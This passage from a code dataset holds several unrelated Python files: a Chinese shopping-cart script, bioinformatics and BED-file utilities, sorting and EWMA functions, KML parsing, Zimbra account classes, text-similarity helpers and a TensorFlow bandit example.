20:\r\n # 展示商品\r\n for key, value in enumerate(shop):\r\n print(key, value)\r\n chose = input(\"请输入您想要的商品:\")\r\n if chose.isdigit():\r\n chose = int(chose)\r\n if chose > len(shop): # len\r\n print(\"没有改号商品!请重新输入!\")\r\n else:\r\n # 钱够不够\r\n if money > shop[chose][1]:\r\n mycart.append(shop[chose])\r\n #使用优惠券\r\n if chose == num and bout > 0 :\r\n rebat_=(shop[chose][1]) * (1 - rebat)\r\n bout = bout - 1\r\n print(\"该商品已使用优惠券优惠了:\",rebat_,\"元\")\r\n else:\r\n rebat_ = 0\r\n money = money - (shop[chose][1]) + rebat_ # 减去价格\r\n print(\"恭喜,添加成功!您的余额还剩\",money)\r\n else:\r\n print(\"穷鬼,钱不够了,别瞎弄!买其他商品吧!\")\r\n elif chose == \"q\" or chose == \"Q\":\r\n print(\"结算中……\")\r\n break # 跳出循环\r\n else:\r\n print(\"对不起,您输入错误,别瞎弄!\")\r\n\r\n i = i + 1\r\n\r\n#消除重复项\r\n\r\n\r\n\r\nprint(\"以下是您的购物小条,请拿好!\")\r\nprint(\"-------------------------------------\")\r\nprint(\"编号 商品 单价 数量 合计\")\r\n#统计商品出现的次数\r\nfor h in range(len(shop)):\r\n sum = 0\r\n for key, value in enumerate(mycart):\r\n if value[1] == shop[h][1]:\r\n sum += 1\r\n if sum > 1:\r\n print(h,\"\\t\",shop[h][0],\"\\t\", shop[h][1],\"\\t\", sum,\"\\t\\t\",((shop[h][1])*sum))\r\n if sum == 1:\r\n print(h,\"\\t\", shop[h][0],\"\\t\", shop[h][1],\"\\t\",sum,\"\\t\\t\",((shop[h][1])*sum))\r\n\r\n\r\nprint(\"-------------------------------------\")\r\nif bout == 0:\r\n print(\"本次优惠券优惠:\",(price*(1-rebat)),)\r\nprint(\"您本次消费:\",(money_1 - money),\"元\")\r\nprint(\"您的余额还剩:\",money,\"元\")\r\nprint(\"欢迎下次光临!\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"交互型商城系统.py","file_name":"交互型商城系统.py","file_ext":"py","file_size_in_byte":3876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"167415141","text":"#!/usr/bin/env python\r\n\r\nimport os\r\nimport sys\r\nimport logging\r\nfrom argparse import ArgumentParser\r\n\r\n#============================= Function =================================\r\n##logging info\r\nDEBUG=\"\" #change it when debugging\r\nlogFormat = \"%(asctime)s [%(levelname)s] %(message)s\"\r\nlevel = \"DEBUG\" if DEBUG != \"\" else \"INFO\"\r\nlogging.basicConfig( stream=sys.stderr, level=level, format=logFormat )\r\n#========================================================================\r\n\r\ndef checkDir(Dirname):\r\n logging.info(\"Checking folder: '%s'\" % Dirname)\r\n dirname = os.path.abspath(Dirname)\r\n if not os.path.isdir(dirname):\r\n logging.error(\"Oops! Folder: '%s' does not exit. Please check!\" % Dirname)\r\n sys.exit(-1)\r\n if not os.access(dirname, os.W_OK):\r\n logging.error(\"Oops! Folder: '%s' is not writable. Please check!\" % Dirname)\r\n sys.exit(-1)\r\n\r\ndef checkFile(Filename):\r\n logging.info(\"Checking file: '%s'\" % Filename)\r\n filename = os.path.abspath(Filename)\r\n if not os.path.isfile(filename):\r\n logging.error(\"Oops! File: '%s' does not exit. Please check!\" % Filename)\r\n sys.exit(-1)\r\n if not os.access(filename, os.R_OK):\r\n logging.error(\"Oops! File: '%s' is not readable. Please check!\" % Filename)\r\n sys.exit(-1)\r\n\r\n\r\ndef renameFastaHeader(fasta, sampleName, delimiter, outDir):\r\n checkFile(fasta)\r\n checkDir(outDir)\r\n name = fasta.rsplit('.', 1)[0]\r\n fasta = os.path.abspath(fasta)\r\n outDir = os.path.abspath(outDir)\r\n outputfile = os.path.join(outDir, '%s.headerModified.fa' % name)\r\n logging.info(\"Start to rename the header ...\")\r\n with open (outputfile, 'w') as fd:\r\n with open (fasta, 'r') as fa:\r\n for line in fa: \r\n line = line.strip()\r\n if line.startswith(\">\"):\r\n line=\">%s%s%s\" % (sampleName, delimiter, line[1:])\r\n fd.write('%s\\n' % line)\r\n logging.info(\"Complete rename the header ...\")\r\n\r\n\r\nif __name__==\"__main__\":\r\n parser = ArgumentParser(description='rename the header of a given fasta file')\r\n parser.add_argument('--version', action='version', version='1.0')\r\n parser.add_argument('-f', dest='fasta', help='a fasta format file', type = str)\r\n parser.add_argument('-n', dest='name', help='name of the sample', type = str)\r\n parser.add_argument('-d', dest='delim', help=\"delimiter. Default: '||'\", type = str)\r\n parser.add_argument('-o', dest='output', help='the output directory', type=str)\r\n args = parser.parse_args()\r\n\r\n if None in [args.fasta, args.name, args.output]:\r\n print(parser.print_help())\r\n exit(-1)\r\n if args.delim == None:\r\n args.delim = \"||\"\r\n renameFastaHeader(args.fasta, args.name, args.delim, args.output)\r\n \r\n\r\n","sub_path":"panGraphViewerApp/scripts/renameFastaHeader.py","file_name":"renameFastaHeader.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"186118343","text":"import random\ndef swap(elementList, indexSwap1, indexSwap2):\n elementList[indexSwap1], elementList[indexSwap2] = elementList[indexSwap2], elementList[indexSwap1]\n\ndef quicksort(a,low=0, high=-1, worst = False):\n global globalCount\n if high == -1:\n high = len(a) -1\n if low < high:\n if worst:\n swap(a,low, a.index(min(a[low:high+1])))\n else:\n swap(a,low, random.randint(low,high))\n\n pivot = low\n for j in range(low+1,high+1):\n globalCount += 1\n if a[j] < a[low]:\n pivot += 1\n swap(a,pivot,j)\n swap(a,low,pivot)\n if pivot > 0:\n quicksort(a,low,pivot-1)\n quicksort(a,pivot+1,high)\n\nglobalCount = 0\nunsortedList = list(random.randint(0,10001) for _ in range(10001))\nquicksort(unsortedList)\nprint(globalCount)\n\nglobalCount = 0\nquicksort(unsortedList, worst=True)\nprint(globalCount)\n\n","sub_path":"2.5.py","file_name":"2.5.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"397369557","text":"\nimport numpy as np\n\n\ndef ewma(x, halflife):\n \"\"\"\n Exponentially Weighted Moving Average\n It is expected that the numbers passed as x will be finite, halflife is\n expected to be a finite, non negative number.\n >>> ewma(np.arange(5), halflife=2)\n array([ 0. , 0.58578644, 1.22654092, 1.91911977, 2.65947261])\n \"\"\"\n assert np.isfinite(halflife) and 0 < halflife\n\n decay_coefficient = np.exp(np.log(0.5) / halflife)\n out = np.empty_like(x, dtype=np.float64)\n\n for i in range(out.shape[0]):\n if i == 0:\n out[i] = x[i]\n sum_prior = 1\n else:\n sum_i = sum_prior + np.power(decay_coefficient, i)\n out[i] = (decay_coefficient * out[i - 1] * sum_prior + x[i]) / sum_i\n sum_prior = sum_i\n\n return out\n\n\nif __name__ == '__main__':\n import pytest\n pytest.main([__file__])\n","sub_path":"fastats/maths/ewma.py","file_name":"ewma.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"79735244","text":"#\n#\n# Obsolete classes and functions. Moved here for sanity. Not checked if it can run as is. Need to check imports.\n#\n\nimport os, sys, pprint\nfrom fastkml import kml,styles\nfrom pygeoif import geometry\n \nFAKE_DATA = {\n \"clusters\" : 5, \n \"outlets\" :10,\n \"activations\":50,\n \"sellouts\": 50,\n \"stocks\":70\n}\n\n\nclass KMLReader:\n def __init__(self, k):\n self._k = k\n self.root = k.features().next()\n \n self.__styles()\n \n def __styles(self):\n if isinstance(self.root, kml.Document):\n self.__styles_dict, self.__stylemap_dict = self.__get_styles()\n \n def __get_styles (self):\n _gs_style_dict = {}\n _gs_stylemap_dict = {}\n for s in self.root.styles():\n if isinstance(s, styles.StyleMap):\n _gs_stylemap_dict[s.id] = { 'normal_url' : s.normal.url, 'highlight_url' : s.highlight.url }\t\t\t\t\n elif isinstance(s, styles.Style):\n for i_s in s.styles():\n if isinstance(i_s, styles.IconStyle):\t\t\t\t\t\n _ = _gs_style_dict.setdefault(s.id, {})\n _['icon_href'] = i_s.icon_href\n \n # end if\n if isinstance(i_s, styles.LineStyle):\n _ = _gs_style_dict.setdefault(s.id, {})\n _['lineColor'] = i_s.color\n _['lineWidth'] = i_s.width\n\n # end if\n if isinstance(i_s, styles.PolyStyle):\n _ = _gs_style_dict.setdefault(s.id, {})\n _.update({ 'polyColor' : i_s.color, 'polyColorMode' : i_s.colorMode, 'polyFill' : i_s.fill, 'polyOutline' : i_s.outline })\n # _gs_style_dict[s.id] = { 'color' : i_s.color, 'colorMode' : i_s.colorMode, 'fill' : i_s.fill, 'outline' : i_s.outline }\n # app.logger.debug(\"Found poly style: %s\", _)\n #end if\n # end for\n # end if\n return _gs_style_dict, _gs_stylemap_dict\n # end for\n def __get_color(self, p_style_url):\n # app.logger.debug(\"stylemap_dict: %s\", pprint.pformat(p_stylemap_dict))\n _s_map = self.__stylemap_dict.get(p_style_url.strip('#'), '')\n # app.logger.debug(\"Style Url: %s, %s\",p_style_url.strip('#'), _s_map)\n if _s_map:\t\t\t\n _s = self.__styles_dict.get(_s_map['normal_url'].strip('#'), '')\n # app.logger.debug(\"Style: %s\", _s)\n if _s:\n return _s['polyColor'], _s['lineColor'], _s['lineWidth']\n # end if\n # end if\n return ''\n # end def _get_color\n\n def __get_icon(self, p_style_url):\n # app.logger.debug(\"stylemap_dict: %s\", pprint.pformat(p_stylemap_dict))\n _s_map = self.__stylemap_dict.get(p_style_url.strip('#'), '')\n # app.logger.debug(\"Style Url: %s, %s\",p_style_url.strip('#'), _s_map)\n if _s_map:\t\t\t\n _s = self.__styles_dict.get(_s_map['normal_url'].strip('#'), '')\n # app.logger.debug(\"Style: %s\", _s)\n if _s:\n return {'href' : _s['icon_href'] }\n # end if\n # end if\n return ''\n def __get_polygons(self, features, selected_elements = [], recurse = False):\n polygons = []\n for c in features: #placemark\n if isinstance(c, kml.Placemark) and isinstance(c.geometry, geometry.Polygon) :\n style_url = c.styleUrl\n _poly_color, _line_color, _line_width = self.__get_color(style_url)\n\n if not selected_elements or c.name in selected_elements: \n polygons.append({\n 'name' : c.name, \n 'coords' :c.geometry.exterior.coords, \n 'description': simplejson.loads(c.description.replace('\\n','')) if c.description else FAKE_DATA, \n 'color': {\n 'polyColor' : _poly_color, \n 'lineColor' : _line_color, \n 'lineWidth' : _line_width,\n }\n })\n \n if isinstance(c, kml.Folder) and recurse:\n _p = self.__get_polygons(c, recurse)\n polygons.extend(_p)\n return polygons\n\n def __get_points(self, features, recurse = False):\n points = []\n for c in features: #placemark\n\n if isinstance(c, kml.Placemark) and isinstance(c.geometry, geometry.Point) :\n\n style_url = c.styleUrl\n # _poly_color, _line_color, _line_width = self.__get_color(style_url)\n i = self.__get_icon(style_url)\n points.append({ 'name':c.name, 'coords' : c.geometry.coords, 'icon' : i, 'description' : simplejson.loads(c.description.replace('\\n','')) if c.description else FAKE_DATA })\n # polygons.append({'name' : c.name, 'coords' :c.geometry.exterior.coords, 'color': { 'polyColor' : _poly_color, 'lineColor' : _line_color, 'lineWidth' : _line_width} })\n \n if isinstance(c, kml.Folder) and recurse:\n _p = self.__get_points(c, recurse)\n points.extend(_p)\n return points\n\n def getPoints(self, folder_name = None):\n points = []\n if isinstance(self.root, kml.Document):\n for b in self.root.features(): # folder\n\n if isinstance(b, kml.Folder) and b.name == folder_name:\n \n points = self.__get_points(b.features()) \n # end for\n # end if\n # end for\n # end if\t\n\n return points\n\n def getPolygons(self, folder_name = None, selected_elements = []):\n polygons = []\n if isinstance(self.root, kml.Document):\n for b in self.root.features(): # folder\n if isinstance(b, kml.Folder) and b.name == folder_name:\n polygons = self.__get_polygons(b.features()) if not selected_elements else self.__get_polygons(b.features(), selected_elements)\n # end for\n # end if\n # end for\n # end if\t\n\n return polygons\n \n\n \n# Utility class for getting Polygon from fastkml.KML objects.\n# DEPRECATED use KMLReader instead\nclass Polygon:\t\n #\n # get the KML object from fastkml, and get the Polygons only\n # returns list of dict.\n # dict contents: name, coords, color.\n\n @staticmethod\n def digest(k):\n # get the color of the style url of style_map from styles\n def _get_color(p_style_url, p_stylemap_dict, p_styles_dict):\n # app.logger.debug(\"stylemap_dict: %s\", pprint.pformat(p_stylemap_dict))\n _s_map = p_stylemap_dict.get(p_style_url.strip('#'), '')\n \n # app.logger.debug(\"Style Url: %s, %s\",p_style_url.strip('#'), _s_map)\n if _s_map:\t\t\t\n _s = p_styles_dict.get(_s_map['normal_url'].strip('#'), '')\n # app.logger.debug(\"Style: %s\", _s)\n if _s:\n \n return _s['polyColor'], _s['lineColor'], _s['lineWidth']\n # end if\n # end if\n return ''\n # end def _get_color\n \n \n # return dictionary of styles, and style map\n # style: key = style url\n #\t value = dict of normal_url and highlight_url\n #\n # style_map: key = style url\n # value: dict of color, colorMode, fill, outline\t\t\n def _get_styles (p_document):\n _gs_style_dict = {}\n _gs_stylemap_dict = {}\n for s in p_document.styles():\n if isinstance(s, styles.StyleMap):\n _gs_stylemap_dict[s.id] = { 'normal_url' : s.normal.url, 'highlight_url' : s.highlight.url }\t\t\t\t\n elif isinstance(s, styles.Style):\n for i_s in s.styles():\n if isinstance(i_s, styles.IconStyle):\t\t\t\t\t\n pass\n # end if\n if isinstance(i_s, styles.LineStyle):\n _ = _gs_style_dict.setdefault(s.id, {})\n _['lineColor'] = i_s.color\n _['lineWidth'] = i_s.width\n\n # end if\n if isinstance(i_s, styles.PolyStyle):\n _ = _gs_style_dict.setdefault(s.id, {})\n _.update({ 'polyColor' : i_s.color, 'polyColorMode' : i_s.colorMode, 'polyFill' : i_s.fill, 'polyOutline' : i_s.outline })\n # _gs_style_dict[s.id] = { 'color' : i_s.color, 'colorMode' : i_s.colorMode, 'fill' : i_s.fill, 'outline' : i_s.outline }\n # app.logger.debug(\"Found poly style: %s\", _)\n #end if\n # end for\n # end if\n # end for\n # app.logger.debug(\"styles_dict: %s\", pprint.pformat( _gs_style_dict ))\n # app.logger.debug(\"stylemap_dict: %s\", pprint.pformat(_gs_stylemap_dict))\n \n return _gs_style_dict, _gs_stylemap_dict\n # end def _get_styles\n \n polygons = []\n styles_dict = {}\n stylemap_dict = {}\n \n top_level = k.features()\n \n for a in k.features(): # document\n if isinstance(a, kml.Document):\n styles_dict, stylemap_dict = _get_styles(a)\n for b in a.features(): # folder\n if isinstance(b, kml.Folder):\n for c in b.features(): #placemark\n if isinstance(c, kml.Placemark):\n style_url = c.styleUrl\n _poly_color, _line_color, _line_width = _get_color(style_url, stylemap_dict, styles_dict )\n polygons.append({'name' : c.name, 'coords' :c.geometry.exterior.coords, 'color': { 'polyColor' : _poly_color, 'lineColor' : _line_color, 'lineWidth' : _line_width} })\n # end if\n # end for\n # end if\n # end for\n # end if\t\n # end for\n return polygons\n","sub_path":"apps/app/deprecated/kml.py","file_name":"kml.py","file_ext":"py","file_size_in_byte":10371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"266597270","text":"import pandas as pd\nimport numpy as np\n\n\nfrom hinpy.classes.object_group_class import *\nfrom time import time as TCounter\n\n\ndef RandomRecommender(start_object_group,end_object_group,parameters,verbose=False):\n\n\n\n start_objects = start_object_group.GetNames()\n end_objects = end_object_group.GetNames()\n\n start_group = start_object_group.name\n end_group = end_object_group.name\n\n relation_name=''\n timestamp=pd.Timestamp('')\n\n if verbose:\n t=TCounter()\n VerboseMessage(verbose,'Computing Random Recommendations of %s for %s...'%(end_group,start_group))\n\n recommended_table=pd.DataFrame(columns=['relation','start_group', 'start_object', 'end_group', 'end_object',\n 'value','timestamp'])\n\n # For each start object...\n counter=0\n for start_obj in start_objects:\n # We select random topK_predictions objects to recommend\n user_list = np.random.choice(end_objects,size=parameters['topK_predictions'])\n for end_obj in user_list:\n recommended_table.loc[counter] = [relation_name,start_group,start_obj,end_group,end_obj,'',timestamp]\n counter+=1\n\n if verbose:\n VerboseMessage(verbose,'Random Recommendations computed in %s.'%(ETSec2ETTime(TCounter()-t)))\n\n return recommended_table,{};\n","sub_path":"hinpy/rs/random_rs.py","file_name":"random_rs.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"71121799","text":"#=========================================================================\n# This is OPEN SOURCE SOFTWARE governed by the Gnu General Public\n# License (GPL) version 3, as described at www.opensource.org.\n# Copyright (C)2016 William H. Majoros (martiandna@gmail.com).\n#=========================================================================\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals, generators, nested_scopes, with_statement)\nfrom builtins import (bytes, dict, int, list, object, range, str, ascii,\n chr, hex, input, next, oct, open, pow, round, super, filter, map, zip)\nfrom Bed3Record import Bed3Record\nfrom Bed6Record import Bed6Record\nimport re\n\n#=========================================================================\n# Attributes:\n# fh : file handle\n# Instance Methods:\n# reader=BedReader(filename)\n# record=reader.nextRecord() # Bed3Record or Bed6Record\n# reader.close()\n# list=BedReader.readAll(filename)\n# hash=BedReader.hashBySubstrate(filename) # chr -> list of records\n# Class Methods:\n# \n#=========================================================================\nclass BedReader:\n \"\"\"BedReader reads bed3 and/or bed6 files\"\"\"\n def __init__(self,filename):\n self.fh=open(filename,\"r\")\n\n @classmethod\n def readAll(cls,filename):\n reader=BedReader(filename)\n array=[]\n while(True):\n record=reader.nextRecord()\n if(not record): break\n array.append(record)\n reader.close()\n return array\n\n @classmethod\n def hashBySubstrate(cls,filename):\n list=cls.readAll(filename)\n hash={}\n for rec in list:\n if(hash.get(rec.chr,None) is None):\n hash[rec.chr]=[]\n hash[rec.chr].append(rec)\n return hash\n\n def close(self):\n self.fh.close()\n\n def nextRecord(self):\n while(True):\n line=self.fh.readline()\n if(not line): return None\n if(not re.search(\"\\S\",line)): continue\n line=line.rstrip()\n line=line.lstrip()\n fields=line.split()\n n=len(fields)\n if(n==3):\n return Bed3Record(fields[0],int(fields[1]),int(fields[2]))\n if(n==4):\n return Bed6Record(fields[0],int(fields[1]),int(fields[2]),\n fields[3],0.0,\".\")\n if(n==5):\n return Bed6Record(fields[0],int(fields[1]),int(fields[2]),\n fields[3],float(fields[4]),\".\")\n if(n==6):\n return Bed6Record(fields[0],int(fields[1]),int(fields[2]),\n fields[3],float(fields[4]),fields[5])\n raise Exception(\"wrong number of fields in bed file: \"+line)\n\n","sub_path":"BedReader.py","file_name":"BedReader.py","file_ext":"py","file_size_in_byte":2811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"305156703","text":"from PaddleController import *\nfrom src.data_models.KeyListener import *\n\n\nclass PlayerPaddleController(PaddleController, KeyListener):\n\n STD_KEY_SET_LETTERS = [pygame.K_w, pygame.K_s] # when on_key_up/down method is called, it is checked if one of these keys is pressed\n STD_KEY_SET_ARROWS = [pygame.K_UP, pygame.K_DOWN]\n\n def __init__(self, paddle, key_set): # [UP_KEY, DOWN_KEY]\n PaddleController.__init__(self, paddle)\n self.key_set = key_set\n\n def on_key_up(self, event):\n if event.key == self.key_set[0]:\n self.get_paddle().on_up_activate()\n elif event.key == self.key_set[1]:\n self.get_paddle().on_down_activate()\n\n def on_key_down(self, event):\n if event.key == self.key_set[0]:\n self.get_paddle().on_up_deactivate()\n elif event.key == self.key_set[1]:\n self.get_paddle().on_down_deactivate()\n\n def update(self, dt):\n pass\n","sub_path":"Pong/src/game/controllers/PlayerPaddleController.py","file_name":"PlayerPaddleController.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"598557274","text":"import numpy as np\nimport pandas as pd\n\nfrom matplotlib import pyplot as plt\nfrom nltk.corpus import stopwords\nfrom nltk.stem import PorterStemmer\nfrom nltk.tokenize import TreebankWordTokenizer\nfrom numpy.linalg import norm\nfrom sklearn.cluster import KMeans\nfrom sklearn.feature_extraction.text import CountVectorizer\n\ntokenizer = TreebankWordTokenizer()\neng_stopwords = tuple(stopwords.words(\"english\"))\nstemmer = PorterStemmer()\n\n\ndef tokenization(sent):\n \"\"\"\n @author: Mihir Gadgil\n Tokenizer for vectorizing sentences.\n \"\"\"\n # Tokenize sentence\n tokens = tokenizer.tokenize(sent)\n # Remove stopwords and stemming\n processed_tokens = [stemmer.stem(token) for token in tokens if token not in eng_stopwords]\n return processed_tokens\n\n\n# Text vectorizer for CosineSimilarity\nvectorizer = CountVectorizer(tokenizer=tokenization, binary=True)\n\n\ndef JaccardSimilarity(sent1, sent2):\n \"\"\"\n @author: Mihir Gadgil\n Sentence Jaccard similarity.\n \"\"\"\n tokens1 = set(tokenizer.tokenize(sent1))\n tokens2 = set(tokenizer.tokenize(sent2))\n\n return len(tokens1.intersection(tokens2)) / len(tokens1.union(tokens2))\n\n\ndef CosineSimilarity(sent1, sent2):\n \"\"\"\n @author: Mihir Gadgil\n Sentence cosine similarity.\n \"\"\"\n sents = vectorizer.fit_transform([sent1, sent2]).toarray()\n return np.matmul(sents[0], sents[1].T) / (norm(sents[0]) * norm(sents[1]))\n\n\nclass StemmerTokenizer(object):\n def __init__(self):\n self.porter_stemmer = PorterStemmer()\n self.treebank_tokenizer = TreebankWordTokenizer()\n\n def __call__(self, sentence):\n return [self.porter_stemmer.stem(token) for token in self.treebank_tokenizer.tokenize(sentence)\n if token not in eng_stopwords]\n\n\ndef KMeansClusteringElbowCurve(quote_dict):\n \"\"\"Shows an elbow curve plot to determine the appropriate number of k-means clusters.\"\"\"\n count_vectorizer = CountVectorizer(tokenizer=StemmerTokenizer(), lowercase=True,\n stop_words=stopwords.words('english'), binary=True)\n X = count_vectorizer.fit_transform(quote_dict.values())\n distorsions = []\n for k in range(1, 4):\n kmeans_model = KMeans(n_clusters=k)\n kmeans_model.fit(X)\n distorsions.append(kmeans_model.inertia_)\n fig = plt.figure(figsize=(15, 5))\n plt.plot(range(1, 4), distorsions)\n plt.title('Elbow Curve')\n plt.show()\n\n\ndef KMeansClustering(quote_dict, clusters=2):\n \"\"\"Returns a pandas data frame containing the quote_dict and cluster label.\"\"\"\n count_vectorizer = CountVectorizer(tokenizer=StemmerTokenizer(), lowercase=True)\n X = count_vectorizer.fit_transform(quote_dict.values()).toarray()\n kmeans_model = KMeans(n_clusters=clusters).fit(X)\n y = kmeans_model.predict(X)\n kmeans_df = pd.DataFrame.from_dict(quote_dict, orient='index', columns=['sentence'])\n kmeans_df[\"cluster\"] = kmeans_model.labels_\n return X, y, kmeans_model, kmeans_df\n\n\ndef KMeansClusteringPlot(X, y, kmeans_model, quote_dict):\n \"\"\"Show clusters with centroids from k-means.\"\"\"\n plt.scatter(X[:, 0][0], X[:, 1][0], s=200, color='blue', label=[k for k in quote_dict.keys()][0])\n plt.scatter(X[:, 0][1], X[:, 1][1], s=200, color='red', label=[k for k in quote_dict.keys()][1])\n plt.scatter(X[:, 0][2], X[:, 1][2], s=200, color='green', label=[k for k in quote_dict.keys()][2])\n centers = kmeans_model.cluster_centers_\n plt.scatter(centers[:, 0], centers[:, 1], c='black', s=100, alpha=0.6)\n plt.legend()\n plt.show()\n\n\nif __name__ == \"__main__\":\n quote_dict = {'cnn': 'witch hunt', 'fox': 'donald trump says this is a witch hunt',\n 'bbc': 'donald trump is a crookity crook who should be impeached'}\n\n kmeans_elbow = KMeansClusteringElbowCurve(quote_dict)\n\n X, y, kmeans_model, kmeans_df = KMeansClustering(quote_dict)\n print(kmeans_df)\n\n kmeans_plot = KMeansClusteringPlot(X, y, kmeans_model, quote_dict)\n","sub_path":"library/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":3956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"167603059","text":"from . import ZObject\n\n\nclass FilterRule(ZObject):\n \"\"\" A mailbox filter rule object\n \"\"\"\n TAG_NAME = 'filter'\n ATTRNAME_PROPERTY = 'name'\n\n\nclass Identity(ZObject):\n \"\"\"An identity object\n \"\"\"\n SELECTORS = ('name', 'id')\n TAG_NAME = 'identity'\n ATTRNAME_PROPERTY = 'name'\n\n def to_creator(self):\n \"\"\" Returns the dict suitable for CreateIdentity or ModifyIdentity\n \"\"\"\n o = {}\n\n for prop in ('name', 'id'):\n if hasattr(self, prop):\n o[prop] = getattr(self, prop)\n\n try:\n if len(self.a) > 0:\n o['a'] = []\n for node in self._unparse_a_tags(self._a_tags):\n o['a'].append(node)\n except AttributeError:\n pass\n return o\n\n def is_default(self):\n \"\"\" Is it the default identity ? \"\"\"\n # it's not just a convention : default identity name cannot be\n # changed...\n return self.name == 'DEFAULT'\n\n def to_selector(self):\n \"\"\" For some reason, the selector for is\n\n \n\n rather than\n\n \n \"\"\"\n\n for i in self.SELECTORS:\n if hasattr(self, i):\n val = getattr(self, i)\n selector = i\n break\n\n return {selector: val}\n\n\nclass Signature(ZObject):\n TAG_NAME = 'signature'\n SELECTORS = ('id', 'name')\n\n @classmethod\n def from_dict(cls, d):\n \"\"\" Override default, adding the capture of content and contenttype.\n \"\"\"\n o = super(Signature, cls).from_dict(d)\n if 'content' in d:\n # Sometimes, several contents, (one txt, other html), take last\n try:\n o._content = d['content']['_content']\n o._contenttype = d['content']['type']\n except TypeError:\n o._content = d['content'][-1]['_content']\n o._contenttype = d['content'][-1]['type']\n\n return o\n\n def to_selector(self):\n \"\"\" For some reason, the selector for is\n\n \n\n rather than\n\n \n \"\"\"\n\n for i in self.SELECTORS:\n if hasattr(self, i):\n val = getattr(self, i)\n selector = i\n break\n\n return {selector: val}\n\n def get_content(self):\n return self._content\n\n def set_content(self, content, contenttype='text/html'):\n self._content = content\n self._contenttype = contenttype\n\n def to_creator(self, for_modify=False):\n \"\"\" Returns a dict object suitable for a 'CreateSignature'.\n\n A signature object for creation is like :\n\n \n My signature content\n \n\n which is :\n\n {\n 'name' : 'unittest',\n 'content': {\n 'type': 'text/plain',\n '_content': 'My signature content'\n }\n }\n\n Note that if the contenttype is text/plain, the content with text/html\n will be cleared by the request (for consistency).\n \"\"\"\n signature = {}\n\n if for_modify:\n try:\n # we should have an ID\n signature['id'] = self.id\n except AttributeError:\n raise AttributeError('a modify request should specify an ID')\n # Case where we change or set a name\n if hasattr(self, 'name'):\n signature['name'] = self.name\n\n else:\n # a new signature should have a name\n signature['name'] = self.name\n\n if self.has_content():\n # Set one, flush the other (otherwise, we let relief behind...)\n if self._contenttype == 'text/plain':\n plain_text = self._content\n html_text = ''\n else:\n html_text = self._content\n plain_text = ''\n\n content_plain = {'type': 'text/plain', '_content': plain_text}\n content_html = {'type': 'text/html', '_content': html_text}\n\n signature['content'] = [content_plain, content_html]\n\n else:\n # A creation request should have a content\n if not for_modify:\n raise AttributeError(\n 'too little information on signature, '\n 'run setContent before')\n\n return signature\n\n def has_content(self):\n return (hasattr(self, '_content') and hasattr(self, '_contenttype'))\n\n def get_content_type(self):\n return self._contenttype\n","sub_path":"zimsoap/zobjects/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":4765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"260047924","text":"import tensorflow as tf\nimport numpy as np\n\nbandits = [0.5, -0.3, 0, -0.2, 0.5]\nnum_bandits = len(bandits)\n\ndef pullBandit(bandit):\n\tresult = np.random.randn(1)\n\tif result > bandit:\n\t\t# Return positive reward\n\t\treturn 1\n\telse:\n\t\t# Return negative reward\n\t\treturn -1\n\ntf.reset_default_graph()\n\n# Feed-forward part of the network. Does the choosing\nweights = tf.Variable(tf.ones([num_bandits])) # tf variable with 1 weights\nchosen_action = tf.argmax(weights,0)\n\n# Establish training procedure. Feed reward and action into network\nreward_holder = tf.placeholder(shape=[1],dtype=tf.float32)\naction_holder = tf.placeholder(shape=[1],dtype=tf.int32)\nresponsible_weight = tf.slice(weights,action_holder,[1])\nloss = -(tf.log(responsible_weight)) * reward_holder\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=0.001)\nupdate = optimizer.minimize(loss)\n\ntotal_episodes = 1000 # total number of iterations for training\ntotal_reward = np.zeros(num_bandits) # scoreboard for bandits\ne = 0.1 # Chance of random action\n\ninit = tf.global_variables_initializer()\n\n# Launch tensorflow graph\nwith tf.Session() as sess:\n\tsess.run(init)\n\ti = 0\n\twhile i < total_episodes:\n\t\tif np.random.rand(1) < e:\n\t\t\taction = np.random.randint(num_bandits)\n\t\telse:\n\t\t\taction = sess.run(chosen_action)\n\n\t\treward = pullBandit(bandits[action]) # Get reward for picking bandit\n\n\t\t# Update network\n\t\t_, resp, ww = sess.run([update, responsible_weight, weights], feed_dict={reward_holder:[reward],action_holder:[action]})\n\t\t# update running tally of scores\n\t\ttotal_reward[action] += reward\n\t\tif i % 50 == 0:\n\t\t\tprint(\"Running reward for the \" + str(num_bandits) + \" bandits \" + str(total_reward))\n\t\ti += 1\n\n\tprint(\"The agent thinks bandit \" + str(np.argmax(ww)+1) + \" is the most promising...\")\n\tif np.argmax(ww) == np.argmax(-np.array(bandits)):\n\t\tprint(\"... and it was right!\")\n\telse:\n\t\tprint(\"... and it was wrong!\")","sub_path":"My Sandbox/armed_bandits.py","file_name":"armed_bandits.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"353950485","text":"#!/usr/bin/env python3\n\"\"\"\n Run commands from .cmd files, storing output in .out files\n\"\"\"\nfrom __future__ import print_function\n\nimport argparse\nimport 